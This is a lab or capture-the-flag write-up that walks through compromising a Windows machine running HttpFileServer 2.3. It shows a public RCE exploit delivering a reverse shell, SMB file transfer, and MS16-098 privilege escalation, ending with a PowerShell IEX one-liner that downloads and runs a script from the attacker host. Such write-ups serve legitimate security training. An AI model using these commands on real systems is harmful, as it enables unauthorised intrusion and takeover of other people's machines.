Here’s what nmap teaches us :
- port 80 (HTTP) - HttpFileServer 2.3 (HFS)
So there is only the web port open, I have the version so let’s check on searchsploit if there is known exploits.
There is a Remote Code Execution, nice let’s download it and try it :
searchsploit -m windows/remote/39161.py
Reading throught the code I see that I have to modify the ip and port :
ip_addr = "10.10.14.10" #local IP address
local_port = "1234" # Local Port number
And there is a note who say :
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
# You may need to run it multiple times for success!
So I need nc, copy it to my directory :
cp /usr/share/windows-resources/binaries/nc.exe ./
I’m ready to exploit !
Exploit
First start the python server on port 80 :
sudo python -m SimpleHTTPServer 80
Then start a nc listener :
nc -lvp 1234
Finally, run the exploit :
python 39161.py 10.10.10.8 80
Go see the nc listener, and voila ! I have a reverse shell and I’m the user :
nc -lvp 1234
listening on [any] 1234 ...
10.10.10.8: inverse host lookup failed: Unknown host

Now let’s escalate to nt authority\system ! For that, I used a script called “windows-exploit-suggester.py” (https://github.com/AonCyberLabs/Windows-Exploit-Suggester) :
This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
For this script to run, I need to give him the results of the windows command “systeminfo” :
systeminfo > systeminfo.txt
To easily transfert files between my linux and windows, I used smbserver.py from Impacket :
sudo smbserver.py liodeus ./
Next, from the windows box copy the file to my system :
copy systeminfo.txt \\10.10.14.10\liodeus\
Run the python script, who first need to be update :
python windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2020-07-23-mssb.xls
[*] done
Then launch the script with the updated file, who was just created :
python windows-exploit-suggester.py --database 2020-07-23-mssb.xls --systeminfo systeminfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension

This gives me a big ouput, with a lot of exploit ! I tested a few of them, but the one who work best for me is MS16-098. Go to the exploit-db link https://www.exploit-db.com/exploits/41020/, in the two first line of the exploit there is a comment who gives us a link to the exploit already compiled, let’s use it !
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
And now, launch it :
C:\Users\kostas\Desktop>\\10.10.14.10\liodeus\41020.exe
\\10.10.14.10\liodeus\41020.exe

Two repository with already compiled Windows exploits :
Two scripts, for Windows privilege escalation check :
- https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Here’s different method to launch them :
powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8000/Sherlock.ps1') ; Find-AllVulns"
